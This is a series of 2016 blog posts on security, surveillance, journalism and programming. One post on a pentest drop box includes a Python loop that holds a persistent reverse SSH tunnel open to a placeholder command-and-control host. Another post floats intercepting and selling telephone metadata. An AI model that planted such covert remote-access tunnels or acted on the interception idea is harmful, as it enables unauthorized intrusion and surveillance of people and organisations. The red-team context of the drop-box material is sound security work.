Filed under: Cybersecurity,Security — Patrick Durusau @ 3:55 pm

$hell on Earth: From Browser to System Compromise by Matt Molinyawe, Abdul-Aziz Hariri, and Jasiel Spelman.

From the paper:

The winning submissions to Pwn2Own 2016 provided unprecedented insight into the state-of-the-art techniques in software exploitation. Every successful submission provided remote code execution as the super user (SYSTEM/root) via the browser or a default browser plug-in. In most cases, these privileges were attained through the exploitation of the Microsoft Windows® or Apple OS X® kernel. Kernel exploitation, using the browser as an initial vector, was a rare sight in previous contests.

This white paper will detail the eight winning browser-to-super-user exploitation chains demonstrated at this year’s contest. Topics such as modern browser exploitation, the complexity of kernel use-after-free vulnerability exploitation, the simplicity of exploiting logic errors, and directory traversals in the kernel are also covered. This paper analyzes all attack vectors, root causes, exploitation techniques, and remediation for vulnerabilities.

Reducing attack surfaces with application sandboxing is a step in the right direction. However, the attack surface remains expansive and sandboxes only serve as minor obstacles on the way to complete compromise. Kernel exploitation is clearly a problem, which has not disappeared and is possibly on the rise. If you’re like us, you can’t get enough of it—it’s shell on earth.

Unless you are still reading Harry Potter and the Cursed Child, the $hell on Earth whitepaper will be your best read for the weekend.

Enjoy!

Your Next Favorite Twitter Account: @DeepDrumpf

Filed under: Neural Networks,Politics,Twitter — Patrick Durusau @ 2:25 pm

@DeepDrumpf is a Neural Network trained on Donald Trump transcripts.

If you are curious beyond the tweets, see: Postdoc’s Trump Twitterbot Uses AI To Train Itself On Transcripts From Trump Speeches.

Ideally an interface would strip @DeepDrumpf and @realDonaldTrump off of tweets and present you with the option to assign authorship to @DeepDrumpf or @realDonaldTrump.

At the end of twenty or thirty tweets, you get your accuracy score over assignment of authorship.
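
A minimal sketch of that quiz in TypeScript (the handles are real, but the tweet data and the guesser below are placeholders of my own):

```typescript
type Author = "@DeepDrumpf" | "@realDonaldTrump";

interface Tweet {
  text: string;
  author: Author;
}

// Remove both handles so the text alone has to carry the signal.
function stripHandles(text: string): string {
  return text.replace(/@DeepDrumpf|@realDonaldTrump/gi, "").trim();
}

// Present each stripped tweet to a guesser and score the guesses as a percentage.
function scoreQuiz(tweets: Tweet[], guess: (text: string) => Author): number {
  let correct = 0;
  for (const tweet of tweets) {
    if (guess(stripHandles(tweet.text)) === tweet.author) correct++;
  }
  return (100 * correct) / tweets.length;
}

// Placeholder round: a guesser that always answers the same way.
const sample: Tweet[] = [
  { text: "I will build great algorithms, believe me. @DeepDrumpf", author: "@DeepDrumpf" },
];
console.log(scoreQuiz(sample, () => "@realDonaldTrump")); // 0 (percent correct)
```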

Enjoy!

August 4, 2016

Anonymous Video – USA -> NSA

Filed under: Government,NSA — Patrick Durusau @ 2:34 pm

While amusing, the topic of this video is deadly serious.

The NSA, firmly, albeit misguidedly, believes:

The United States today faces very real, very grave national security threats. Extremism and international terrorism flourish in too many areas of the world, threatening our warfighters, our allies and our homeland. Regional conflicts can have serious effects on U.S. national interests. Hostile foreign governments and terrorists trade in, or seek to acquire, weapons of mass destruction and/or the materials to produce them. Tons of illegal drugs are smuggled into our country each year.

The newest threats we face, and perhaps the fastest growing, are those in cyberspace. Cyber threats to U.S. national and economic security increase each year in frequency, scope and severity of impact. Cyber criminals, hackers and foreign adversaries are becoming more sophisticated and capable every day in their ability to use the Internet for nefarious purposes.

As a nation, we are dependent on the Internet – we use it for everything. We communicate online, bank and shop online, and store much of our personal information there. In business, education and government, we all count on having ready access to the Internet and its many capabilities as we go about our daily routines. The Internet opens up new worlds to users.

But while cyberspace offers great opportunities, it also comes with vulnerabilities. Our information networks and technology are constantly at risk from a variety of bad actors using a multitude of techniques – remote hacking intrusions, the placement of malware, spearphishing and other means of gaining access to networks and information.

Some of these bad actors are criminals motivated by profit, particularly in the areas of identity theft and other forms of financial cybercrime. The cost of cybercrime – already in the billions of dollars – rises each year.

But cyber threats also come from nation states and other actors who seek to exploit information to gain an advantage over the United States. They might seek an economic advantage, or to gain insight into our military or foreign policy. Denial of service attacks disrupt business and undermine confidence.

Terrorists and extremist groups today use the power of the Internet, especially social media, to spread their messages of hate and intolerance, and to recruit new members, often targeting vulnerable young people. The global reach of cyberspace and the complexity of its networks provide bad actors ample places to hide, safe from the reach of international law.

To meet these threats, our national leaders, military leaders, policy makers and law enforcement personnel must understand who our adversaries are, where they are, and what their capabilities, plans and intentions are. At the same time, we must ensure that we protect our own national security information from those who would do us harm. These are the capabilities that the National Security Agency provides to our nation, to our leaders and to our fellow Americans – 24 hours a day, seven days a week. [Understanding The Threat]

Surrounded by jinns and demons, known and unknown, as the only hope for Truth, Justice and the American Way, what choice does the NSA have but to use any and all means, fair and foul, to meet those threats?

As you know, I’m not a big fan of the NSA or its surveillance programs, but in researching this post, I encountered a shift in the rhetoric of the NSA.

As you can see in Understanding The Threat, the entire focus is on hazards and dangers that would justify any action, however lawless.

Contrast that with the Commitment that is preserved by the Internet Archive (December, 2015):

These are our commitments to you, our fellow citizens:

  • We will act with integrity to advance the rights, goals, and values of the Nation.
  • We will adhere to the spirit and the letter of the Constitution and the laws and regulations of the United States.
  • We will support and protect our troops in the field.
  • We will combat terrorism around the globe – when necessary, putting our lives on the line to preserve the Nation.
  • We will provide our policymakers, negotiators, ambassadors, law enforcement community, and military the vital intelligence they need to protect and defend the Nation.
  • We will defend the national security networks vital to our Nation.
  • We will be a trusted steward of public resources and place prudent judgment over expediency.
  • We will continually strive for transparency in all our review, monitoring, and decision-making processes.
  • We will be accountable for our actions and take responsibility for our decisions.
  • We will honor Open Government and Transparency mandates by making timely and accurate information available to the public, subject to valid privacy, confidentiality, security or other restrictions under existing law and policies.

What I find even more disturbing than the current threat statement is that it was written after mass collection of telephone data (under the Commitment) was found to be useless:

A member of the White House review panel on NSA surveillance said he was “absolutely” surprised when he discovered the agency’s lack of evidence that the bulk collection of telephone call records had thwarted any terrorist attacks.

“It was, ‘Huh, hello? What are we doing here?’” said Geoffrey Stone, a University of Chicago law professor, in an interview with NBC News. “The results were very thin.”

While Stone said the mass collection of telephone call records was a “logical program” from the NSA’s perspective, one question the White House panel was seeking to answer was whether it had actually stopped “any [terror attacks] that might have been really big.”

“We found none,” said Stone.

Under the NSA program, first revealed by ex-contractor Edward Snowden, the agency collects in bulk the records of the time and duration of phone calls made by persons inside the United States.

Stone was one of five members of the White House review panel – and the only one without any intelligence community experience – that this week produced a sweeping report recommending that the NSA’s collection of phone call records be terminated to protect Americans’ privacy rights. (NSA program stopped no terror attacks, says White House panel member by Michael Isikoff.)

Shouldn’t the three hundred plus page report: Liberty and Security in a Changing World, dated 12 December 2013, result in a less paranoid, less extreme view of threats?

Pursuit of a paranoid and largely delusional view of the world, even post-exposure as paranoid and delusional, does not bode well for those subject to NSA surveillance.

Encrypt, Onionize and Erase (EOE) is your new mantra.

Tor Browser User Manual (updated)

Filed under: Cybersecurity,Security,Tor — Patrick Durusau @ 1:15 pm

Tor Browser User Manual 6.0.1.

From About Tor Browser:

Tor Browser uses the Tor network to protect your privacy and anonymity. Using the Tor network has two main properties:

  • Your internet activity, including the names and addresses of the websites you visit, will be hidden from your Internet service provider and from anyone watching your connection locally.
  • The operators of the websites and services that you use, and anyone watching them, will see a connection coming from the Tor network instead of your real Internet (IP) address, and will not know who you are unless you explicitly identify yourself.

In addition, Tor Browser is designed to prevent websites from “fingerprinting” or identifying you based on your browser configuration.

By default, Tor Browser does not keep any browsing history. Cookies are only valid for a single session (until Tor Browser is exited or a New Identity is requested).

With intelligence agencies promising to obey the law in the future, the saying:

Fool me once,

Shame on you;

Fool me twice,

Shame on me.

comes to mind.

Surf without Tor if you believe liars and law breakers won’t continue to be liars and law breakers, but for the rest of us the rule is:

Tor: Don’t surf the Internet Without It.

Get A Re-usable NRC License for Radioactive Material Today!

Filed under: Cybersecurity,Government,Security — Patrick Durusau @ 10:48 am

A secret group bought the ingredients for a dirty bomb — here in the U.S. by Patrick Malone.

From the post:

The clandestine group’s goal was clear: Obtain the building blocks of a radioactive “dirty bomb” — capable of poisoning a major city for a year or more — by openly purchasing the raw ingredients from authorized sellers inside the United States.

It should have been hard. The purchase of lethal radioactive materials — even modestly dangerous ones — requires a license from the Nuclear Regulatory Commission, a measure meant to keep them away from terrorists. Applicants must demonstrate they have a legitimate need and understand the NRC’s safety standards, and pass an on-site inspection of their equipment and storage.

But this secret group of fewer than 10 people — formed in April 2014 in North Dakota, Texas and Michigan — discovered that getting a license and then ordering enough materials to make a dirty bomb was strikingly simple in one of their three tries. Sellers were preparing shipments that together were enough to poison a city center when the operation was shut down.

The team’s members could have been anyone — a terrorist outfit, emissaries of a rival government, domestic extremists. In fact, they were undercover bureaucrats with the investigative arm of Congress. And they had pulled off the same stunt nine years before. Their fresh success has set off new alarms among some lawmakers and officials in Washington about risks that terrorists inside the United States could undertake a dirty bomb attack.

Fortunately, GAO investigators have shown no tendencies toward plotting the overthrow of the United States government. If they had such tendencies, our government would have fallen long ago.

Malone provides an enjoyable account of the GAO romp through regulated access to radioactive materials.

Despite the language of Regulation of Radioactive Materials, the ease of obtaining radioactive materials will surprise you.

If you are interested in the security for hazardous biological materials, see: Preliminary Observations on Federal Efforts to Address Weaknesses Exposed by Recent Safety Lapses GAO-15-792T: Published: Jul 28, 2015. Publicly Released: Jul 28, 2015.

Puts our collective hand-wringing over SQL injection attacks into perspective. Yes?

Joel Simon (@Joelcpj): Woodward and Bernstein Not “Ethical and Committed” Journalists

Filed under: Government,Journalism,News,Reporting,Wikileaks — Patrick Durusau @ 10:01 am

Joel Simon‘s opinion piece How journalists can cover leaks without helping spies, leaves you with the conclusion that Woodward and Bernstein (Watergate) were not “ethical and committed” journalists.

Skipping the nationalistic ranting and “compelling evidence,” which turns out to be the New York Times parroting surmises and guesses by known liars (U.S. intelligence community), Simon writes of the Wikileaks dump of DNC emails:


As for WikiLeaks, by publishing a data dump without verifying the source or providing its readers with the context to make informed decisions about the motivations of the leakers, it is allowing itself to be a vehicle for governments like Russia that are weaponizing information and using it to achieve policy objectives. Ethical and committed journalists should do all within their power to ensure they are never put in such a position. (emphasis added)

For more than thirty years, 1972 – 2005, the Watergate source known as “Deep Throat (W. Mark Felt),” and his motives, remained a mystery to the American public.

Yet, his revelations were instrumental in bringing down an American president (Richard Nixon).

Mark Felt was a friend of Bob Woodward, and their meeting in a parking garage on October 9th, 1972, led to the October 10, 1972 Washington Post story titled: FBI Finds Nixon Aides Sabotaged Democrats.

In case you don’t remember, 1972 was a presidential election year, with the election being held on November 7, 1972.

Consider those three dates, the discussion between Bernstein and Felt (October 9, 1972), the Washington Post story (October 10, 1972) and the presidential election (November 7, 1972). Or perhaps better:


October 9, 1972 – 29 days until voting begins in presidential election

October 10, 1972 – 28 days until voting begins in presidential election

November 7, 1972 (election day)

The timing of the leak and its publication by the Washington Post less than thirty (30) days prior to a presidential election certainly make the motives of the leaker a relevant question.

Yet, Deep Throat remained unknown and “…readers with[out] the context to make informed decisions about the motivations of the [Deep Throat/Mark Felt]…” for more than thirty years.

Contrary to Joel Simon’s criteria, Woodward and Bernstein verified and corroborated that the information given to them by Deep Throat/Mark Felt was truthful, but did not explore, for their readers, any possible motivations on his part.

The authenticity of the DNC emails has not been challenged, and the resignations of Wasserman Schultz (DNC Chair), Amy Dacey (DNC CEO), Brad Marshall (DNC CFO) and Luis Miranda (DNC Communications Director), along with a public apology to Bernie Sanders by the Democratic National Committee, are all supporting evidence that the DNC email leak is both accurate and authentic.

Unlike Joel Simon, I think Woodward and Bernstein were “ethical and committed” journalists during Watergate, providing their readers with accurate information in a timely manner.

Without exploring the motives of why someone would leak truthful information.

The CJR, Joel Simon and the media generally should abandon their attempts to twist journalistic ethics to exclude publication of truthful information of legitimate interest to a voting public.

Judging from the tone of Simon’s post, his concerns are driven more by rabid nationalism and jingoism than any legitimate concern for journalistic ethics.

August 3, 2016

How to Build Your Own Penetration Testing Drop Box (Hardware)

Filed under: Cybersecurity,Security — Patrick Durusau @ 4:22 pm

How to Build Your Own Penetration Testing Drop Box by Beau Bullock.

With politics bleeding into even highly filtered feeds, thought it might be amusing to look at a hardware construction project.

I compared three single-board computers (SBC) against each other with a specific goal of finding which one would serve best as a “penetration testing drop box”, and maintain an overall price of around $110. Spoiler Alert: At the time I tested these Hardkernel’s ODROID-C2 absolutely destroyed the competition in this space. If you want to skip the SBC comparison and jump right to building your own pentest drop box you can find the instructions below and also here.

Overview

A few weeks ago I was scheduled for an upcoming Red Team exercise for a retail organization. In preparation for that assessment I started gathering all the gear I might need to properly infiltrate the organization, and gain access to their network. Social engineering attacks were explicitly removed from the scope for this engagement. This meant I wasn’t going to be able to ask any employees to plug in USB devices, let me in certain rooms, or allow me to “check my email” on their terminals (yes this works).

Essentially, what were left at that point were physical attacks. Could I get access to a terminal left unlocked and perform a HID-based (think Rubber Ducky) attack? If the system wasn’t unlocked, perhaps a USB-Ethernet adapter (like the LAN Turtle) could be placed in line with the system to give me a remote shell to work from. Even if I could get physical access, without any prior knowledge of the network’s egress filtering setup, was I going to be able to get a shell out of the network? So this led me down the path of building a pentest drop box that I could place on a network, could command over a wireless adapter, automatically SSH out of a network, and just be an all-around pentesting box.

Some Device Requirements

Looking into the available options already out there it is very clear that I could either spend over $1,000 to buy something that did what I needed it to do, or try to build one comparable for significantly cheaper. So I set some very specific goals of what I wanted this device to do. Here they are:

  • Device has to be relatively unnoticeable in size (could be plugged in under a desk unnoticed)
  • Has to be able to be controlled over a wireless interface (bonus points if multiple wireless interfaces can be used so wireless management and wireless attacks can happen concurrently)
  • Persistent reverse SSH tunnel to a command and control server
  • Fully functional pentesting OS (not just a shell to route attacks through)
  • Decent storage space (32-64GB)
  • Actually be a usable pentesting box that is not sluggish due to hardware restrictions
  • Cost around $110 total to build

I like that, requirements!

Assuming you have a briefcase or a bulky coat, this is not a bad piece of hardware to have on you, unless you anticipate physical searches. You can never tell when you will be curious about something.
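For the “persistent reverse SSH tunnel” requirement in Beau’s list, here is a minimal sketch of what the drop box might run at boot. This is my sketch, not Beau’s build script: the C2 hostname and port are hypothetical, and it assumes key-based SSH authentication is already set up for unattended logins.

```python
import subprocess
import time

# Hypothetical command-and-control host; the drop box's SSH key must
# already be authorized there for unattended logins.
C2_HOST = "tunnel@c2.example.com"

while True:
    # Expose the drop box's own SSH daemon on port 2222 of the C2 server,
    # so the operator can reach the box even behind NAT or egress filtering.
    subprocess.run([
        "ssh", "-N",
        "-o", "ServerAliveInterval=30",
        "-o", "ExitOnForwardFailure=yes",
        "-R", "2222:localhost:22",
        C2_HOST,
    ])
    # If the tunnel drops (network change, far end reboot), wait and retry.
    time.sleep(15)
```

In practice you would wrap something like this in a systemd unit or cron @reboot entry so it survives power cycles, but the retry loop is the heart of it.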

Functional TypeScript

Filed under: Functional Programming,Programming — Patrick Durusau @ 3:29 pm

Functional TypeScript by Victor Savkin.

From the post:

When discussing functional programming we often talk about the machinery, and not the core principles. Functional programming is not about monads, monoids, or zippers, even though those are useful to know. It is primarily about writing programs by composing generic reusable functions. This article is about applying functional thinking when refactoring TypeScript code.

And to do that we will use the following three techniques:

  • Use Functions Instead of Simple Values
  • Model Data Transformations as a Pipeline
  • Extract Generic Functions

Let’s get started!
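As a rough illustration of those three techniques, here is a sketch written in Python rather than TypeScript. The pipeline helper and the pricing example are mine, not from Savkin’s post, but the shape of the argument is the same: pass functions where you would otherwise pass constants, and compose small steps into a pipeline.

```python
from functools import reduce
from typing import Callable

# 3. Extract a generic function: compose any number of single-argument steps.
def pipeline(*steps: Callable) -> Callable:
    return lambda value: reduce(lambda acc, step: step(acc), steps, value)

# 1. Use functions instead of simple values: a "tax" is a rule, not a number.
def percent_tax(rate: float) -> Callable[[float], float]:
    return lambda amount: amount * (1 + rate)

def round_to_cents(amount: float) -> float:
    return round(amount, 2)

# 2. Model the data transformation as a pipeline of reusable steps.
price_with_tax = pipeline(percent_tax(0.07), round_to_cents)

print(price_with_tax(19.99))  # 21.39
```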

Parallel processing has been cited as a driver for functional programming for many years. See, for example, It’s Time to Get Good at Functional Programming.

The movement of the United States government towards being a “franchise” is another important driver for functional programming.

Code that has no side effects can be more easily repurposed, depending on the needs of a particular buyer.

The NSA wants terabytes of telephone metadata to maintain its “data mining as useful activity” fiction; China wants telephone metadata on its financial investments; other groups are spying on themselves and/or others.

It is wasteful, not to mention expensive, to maintain side-effect-ridden code bases for each customer.

Prepare for universal parallel processing and governments as franchises, start thinking functionally today!

Telephone Metadata Can Reveal Surprisingly Sensitive Personal Information

Filed under: Government,Intelligence,Privacy,Telecommunications — Patrick Durusau @ 2:58 pm

Stanford computer scientists show telephone metadata can reveal surprisingly sensitive personal information by Bjorn Carey.

The intelligence community’s assertion that telephone metadata only enables “connecting the dots” has been confirmed to be a lie.

From the post:

Most people might not give telephone metadata – the numbers you dial, the length of your calls – a second thought. Some government officials probably view it as similarly trivial, which is why this information can be obtained without a warrant.

But a new analysis by Stanford computer scientists shows that it is possible to identify a person’s private information – such as health details – from metadata alone. Additionally, following metadata “hops” from one person’s communications can involve thousands of other people.

The researchers set out to fill knowledge gaps within the National Security Agency’s current phone metadata program, which has drawn conflicting assertions about its privacy impacts. The law currently treats call content and metadata separately and makes it easier for government agencies to obtain metadata, in part because it assumes that it shouldn’t be possible to infer specific sensitive details about people based on metadata alone.

The findings, reported today in the Proceedings of the National Academy of Sciences, provide the first empirical data on the privacy properties of telephone metadata. Preliminary versions of the work, previously made available online, have already played a role in federal surveillance policy and have been cited in litigation filings and letters to legislators in both the United States and abroad. The final work could be used to help make more informed policy decisions about government surveillance and consumer data privacy.

The computer scientists built a smartphone application that retrieved the previous call and text message metadata – the numbers, times and lengths of communications – from more than 800 volunteers’ smartphone logs. In total, participants provided records of more than 250,000 calls and 1.2 million texts. The researchers then used a combination of inexpensive automated and manual processes to illustrate both the extent of the reach – how many people would be involved in a scan of a single person – and the level of sensitive information that can be gleaned about each user.

From a small selection of the users, the Stanford researchers were able to infer, for instance, that a person who placed several calls to a cardiologist, a local drugstore and a cardiac arrhythmia monitoring device hotline likely suffers from cardiac arrhythmia. Another study participant likely owns an AR semiautomatic rifle, based on frequent calls to a local firearms dealer that prominently advertises AR semiautomatic rifles and to the customer support hotline of a major firearm manufacturer that produces these rifles.

One of the government’s justifications for allowing law enforcement and national security agencies to access metadata without warrants is the underlying belief that it’s not sensitive information. This work shows that assumption is not true.

See Carey’s post for the layperson’s explanation of the Stanford findings or dive into Evaluating the privacy properties of telephone metadata by Jonathan Mayer, Patrick Mutchler, and John C. Mitchell, for more detailed analysis. (Thankfully open access.)
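To make the style of inference concrete, here is a toy sketch. The phone numbers and category labels are invented, and the Stanford team’s actual pipeline combined automated directory lookups with manual review, but the idea is the same: who you call, how often, says a great deal on its own.

```python
from collections import Counter

# Hypothetical lookup: numbers annotated by hand or from a business directory.
NUMBER_CATEGORIES = {
    "+1-555-0134": "cardiologist",
    "+1-555-0177": "pharmacy",
    "+1-555-0199": "cardiac device support line",
    "+1-555-0142": "pizza delivery",
}

# One subscriber's call metadata: just the numbers dialed, no content.
call_log = [
    "+1-555-0134", "+1-555-0177", "+1-555-0199",
    "+1-555-0134", "+1-555-0142",
]

# Count how often each category of callee appears in the metadata.
category_counts = Counter(
    NUMBER_CATEGORIES.get(number, "unknown") for number in call_log
)

# Repeated contact with medically specific numbers supports an inference
# like the cardiac arrhythmia example in the Stanford study.
medical = {"cardiologist", "pharmacy", "cardiac device support line"}
if sum(category_counts[c] for c in medical) >= 3:
    print("Metadata alone suggests a likely cardiac condition:",
          dict(category_counts))
```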

Would law enforcement and national security agencies still consider telephone metadata “not sensitive” if hackers were obtaining it from telecommunication companies and/or plucking it out of the airwaves that carry those signals?

If you were interested only in law enforcement, national security agencies and governments, that would be a much smaller set of data to track and process.

Sounds like a business opportunity, depending on the country, its degree of technology, and the market conditions for pro- or anti-government data.

U.S. government satellites collect such data but it is shared (or not) for odd and obscure reasons.

I’m thinking more along the lines of commercial transactions between willing sellers and buyers.

Think of it as a Rent-An-NSA type venture. Customers don’t want or need 24×7 rivals for power. Properly organized, they could buy as much or as little intelligence as they need. Exclusive access to some intelligence would be a premium product.

OnionRunner, ElasticSearch & Maltego

Filed under: ElasticSearch,Graphs,OnionRunner,Tor,Visualization — Patrick Durusau @ 2:21 pm

OnionRunner, ElasticSearch & Maltego by Adam Maxwell.

From the post:

Last week Justin Seitz over at automatingosint.com released OnionRunner which is basically a python wrapper (because Python is awesome) for the OnionScan tool (https://github.com/s-rah/onionscan).

At the bottom of Justin’s blog post he wrote this:

For bonus points you can also push those JSON files into Elasticsearch (or modify onionrunner.py to do so on the fly) and analyze the results using Kibana!

Always being up for a challenge, I’ve done just that. The onionrunner.py script outputs each scan result as a JSON file; you have two options for loading this into ElasticSearch. You can either load your results after you’ve run a scan or you can load them into ElasticSearch as a scan runs. Now this might sound scary but it’s not, let’s tackle each option separately.

A great enhancement to Justin’s original OnionRunner!
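If you take the load-after-a-scan route, a minimal sketch using the official elasticsearch Python client might look like the following. The index name, results directory and client version (8.x) are my assumptions, not details from Adam’s post; adjust them to wherever onionrunner.py drops its output.

```python
import json
from pathlib import Path

from elasticsearch import Elasticsearch  # official Python client, 8.x assumed

es = Elasticsearch("http://localhost:9200")  # hypothetical local node

# onionrunner.py writes one JSON document per scanned .onion service;
# the directory name here is a guess, point it at your own results folder.
for result_file in Path("onionscan_results").glob("*.json"):
    doc = json.loads(result_file.read_text())
    es.index(index="onionscan", document=doc)  # use body=doc on older 7.x clients
    print(f"indexed {result_file.name}")
```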

You will need a version of Maltego to perform the visualization as described. Not a bad idea to become familiar with Maltego in general.

Data is just data, until it is analyzed.

Enjoy!

